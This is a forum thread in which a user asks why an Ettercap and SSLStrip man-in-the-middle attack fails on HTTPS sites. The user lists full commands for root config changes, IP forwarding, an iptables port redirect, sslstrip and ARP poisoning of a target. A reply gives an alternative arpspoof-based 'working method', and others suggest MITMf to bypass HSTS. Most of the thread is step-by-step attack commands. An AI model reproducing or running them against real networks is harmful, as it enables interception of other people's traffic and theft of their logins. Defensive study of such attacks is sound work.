Forum Thread: Struggling to Perform a MITM Attack Using Ettercap and SSLStrip

Struggling to Perform a MITM Attack Using Ettercap and SSLStrip

Hi I need some help performing a MITM attack using ettercap, i can access non https websites on the target machine but when i try access https websites i either get web page cannot be displayed or something about a security certificate not being trusted am i doing anything wrong ? please help me out it would be greatly appreciated, the steps below are the route I've followed and I've also tried the graphical interface of ettercap with no luck

Type In Terminal: kwrite /etc/etter.conf
navigate to ecuid , change the value 65534 to 0
navigate to ec
gid , change the value 65534 to 0
remove the # from the If you use iptables
save

Setup IP forwarding on my Kali device by typing:

echo 1 > /proc/sys/net/ipv4/ipforward

and setup port redirection using Iptables:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

Start SSLstrip

sslstrip -a -f -l 8080 -w ssl

then start Ettercap

ettercap -T -q -i wlan0 -M arp /ipofthetarget//

6 Responses

The following is a working method I used several times. Change the bold text according to your setup.
> echo 1 > /proc/sys/net/ipv4/ip_forward
> iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
> arpspoof -i wlan0 -t TargetIP -r GatewayIP
> sslstrip -l 8080
Try this way (without ettercap) and see if it works.
TRT

Browsers have been updated and now use HSTS which blocks Mitm attacks & sslstrip. You should try mitmf https://github.com/byt3bl33d3r/MITMf it can override HSTS but its still a bit difficult if the target still has cookies from the previous session

This ^
You can find numerous tutorials on this site on how to use it.

thanks for the replies and yeah looks like mitm attacks are pretty much useless now with the HSTS after I looked into it

Well, HSTS definitely makes it more difficult, but not impossible. Please check out Ciuffy's article here .

But this one MITM attack is only for local network?
thanks

Share Your Thoughts

  • Hot
  • Active